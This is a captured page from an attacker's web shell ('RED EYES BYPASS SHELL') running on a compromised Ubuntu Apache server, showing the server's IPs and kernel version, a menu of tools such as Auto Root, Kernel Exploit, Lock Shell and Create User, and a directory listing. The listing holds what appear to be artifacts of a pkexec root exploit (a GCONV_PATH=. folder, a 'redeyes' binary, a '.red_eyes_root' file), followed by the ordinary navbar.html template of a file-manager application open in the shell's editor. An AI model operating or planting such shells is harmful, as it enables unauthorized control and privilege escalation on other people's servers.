Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
template /
common /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
footer.html
986
B
-rwxr-xr-x
footerCommon.html
1.68
KB
-rwxr-xr-x
header.html
2.19
KB
-rwxr-xr-x
navbar.html
5.39
KB
-rwxr-xr-x
navbarShare.html
2.73
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
showTips.html
3.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : navbar.html
<div class="full-background"></div> <div class="init-loading"> <div><img src="<?php echo STATIC_PATH;?>images/common/loading_simple.gif?v=<?php echo KOD_VERSION;?>"/></div> </div> <div class="topbar aero"> <div class="content"> <button class="btn btn-wap-menu hidden" data-toggle="collapse" data-target="#top-menu-left" ><i class="font-icon icon-reorder"></i></button> <div class="top-left collapse" id="top-menu-left"> <?php $config = $GLOBALS['config']; $html = '<a href="./" class="topbar-menu title">'; $subMenu = ''; $isWap = is_wap(); if(substr(LNG('kod_name'),0,4) == '<img'){ $html .= LNG('kod_name').'</a>'; }else{ $html .= '<i class="icon-cloud"></i>'.LNG('kod_name').'</a>'; } foreach ($config['settingSystem']['menu'] as $key=>$value) { if ($value['use']!='1') continue; $has = ST==$value['name']?'this':''; $target = " target='_self'" ; if($value['target']=='1' || $value['target'] == '_blank'){ $target = " target='_blank'" ; } $name = rawurldecode($value['name']); if(LNG('ui_'.$name) != 'ui_'.$name){ $name = "<i class='font-icon menu-".$name."'></i><span>".LNG('ui_'.$name).'</span>'; }else if($value['icon']){ $name = $value['icon'].'<span>'.LNG($name).'</span>'; }else if(!strstr($name,'<') && $value['subMenu']){ $name = "<i class='font-icon words'><em>".$name."</em></i><span>".LNG($name).'</span>'; } if($value['subMenu'] && !$isWap){ $subMenu .= "<li><a class='topbar-menu-sub ".$has."' href='".urldecode($value['url'])."'" .$target.">".urldecode($name)."</a></li>"; }else{ $html .= "<a class='topbar-menu ".$has."' href='".urldecode($value['url'])."'" .$target.">".urldecode($name)."</a>"; } } echo $html; ?> <?php if($subMenu){?> <div class="menu-group fl"> <a class="topbar-menu" id="topbar-submenu" data-toggle="dropdown" href="#" title="<?php echo LNG('menu_sub_menu');?>"> <i class="icon-th-large"></i> </a> <ul class="dropdown-menu topbar-submenu pull-left animated menuShow" role="menu" aria-labelledby="topbar-submenu"> <?php echo $subMenu;?> </ul> </div> <?php } ?> </div> <div class="top-right"> <?php if(!isset($config['settings']['language'])){ ?> <div class="menu-group"> <a id='topbar-language' data-toggle="dropdown" href="#" class="topbar-menu"> <i class='font-icon icon-flag'></i> <b class="caret"></b> </a> <ul class="dropdown-menu topbar-language pull-right animated menuShow" role="menu" aria-labelledby="topbar-language"> <?php $tpl = ""; foreach ($config['settingAll']['language'] as $key => $value) { $name = $value[0]; $select = I18n::getType() == $key ? "this":""; $tpl .= "<li><a href='javascript:core.language(\"{$key}\");' title=\"{$key}/{$value[1]}/{$value[2]}\" class='{$select}'><i class='lang-flag flag-{$key}'></i>{$name}</a></li>"; } echo $tpl; ?> </ul> </div> <?php } ?> <!-- 全局设置语言则不再显示 --> <div class="menu-group"> <a href="#" id='topbar-user' data-toggle="dropdown" class="topbar-menu"> <i class="font-icon icon-user"></i> <?php $user = $_SESSION['kodUser']; $name = $user['nickName']?$user['nickName']:$user['name']; echo clear_html($name); ?> <b class="caret"></b> </a> <ul class="dropdown-menu menu-topbar-user pull-right animated menuShow" role="menu" aria-labelledby="topbar-user"> <?php if($GLOBALS['isRoot']){ ?> <li class="menu-system-setting"><a href="#" onclick="core.setting('system');"><i class="font-icon icon-cog"></i><?php echo LNG('system_setting');?></a></li> <?php } ?> <?php if($GLOBALS['isRoot'] || $GLOBALS['auth']['systemMember.get']){ ?> <li class="menu-system-group"><a href="#" onclick="core.setting('member');"><i class="font-icon icon-group"></i><?php echo LNG('setting_member');?></a></li> <?php } ?> <?php if($GLOBALS['isRoot'] || $GLOBALS['auth']['pluginApp.index']){ ?> <li class="menu-system-plugin"> <a href="#" onclick="core.openWindowBig('./index.php?pluginApp/index','<?php echo LNG('PluginCenter');?>');"><i class="font-icon icon-puzzle-piece"></i><?php echo LNG('PluginCenter');?></a></li> <li role="presentation" class="divider"></li> <?php } ?> <li class="menu-system-user"><a href="#" onclick="core.setting('user');"><i class="font-icon icon-user"></i><?php echo LNG('setting_user');?></a></li> <li class="menu-system-theme"><a href="#" onclick="core.setting('theme');"><i class="font-icon icon-dashboard"></i><?php echo LNG('setting_theme');?></a></li> <li class="menu-system-full"><a href="#" onclick="core.fullScreen();"><i class="font-icon icon-fullscreen"></i><?php echo LNG('full_screen');?></a></li> <li class="menu-system-help"><a href="#" onclick="core.setting('help');"><i class="font-icon icon-question"></i><?php echo LNG('setting_help');?></a></li> <li class="menu-system-about"><a href="#" onclick="core.setting('about');"><i class="font-icon icon-info-sign"></i><?php echo LNG('setting_about');?></a></li> <li role="presentation" class="divider"></li> <li class="menu-system-logout"><a href="./index.php?user/logout"><i class="font-icon icon-signout"></i><?php echo LNG('ui_logout');?></a></li> </ul> </div> </div> <div style="clear:both"></div> </div> </div>
Close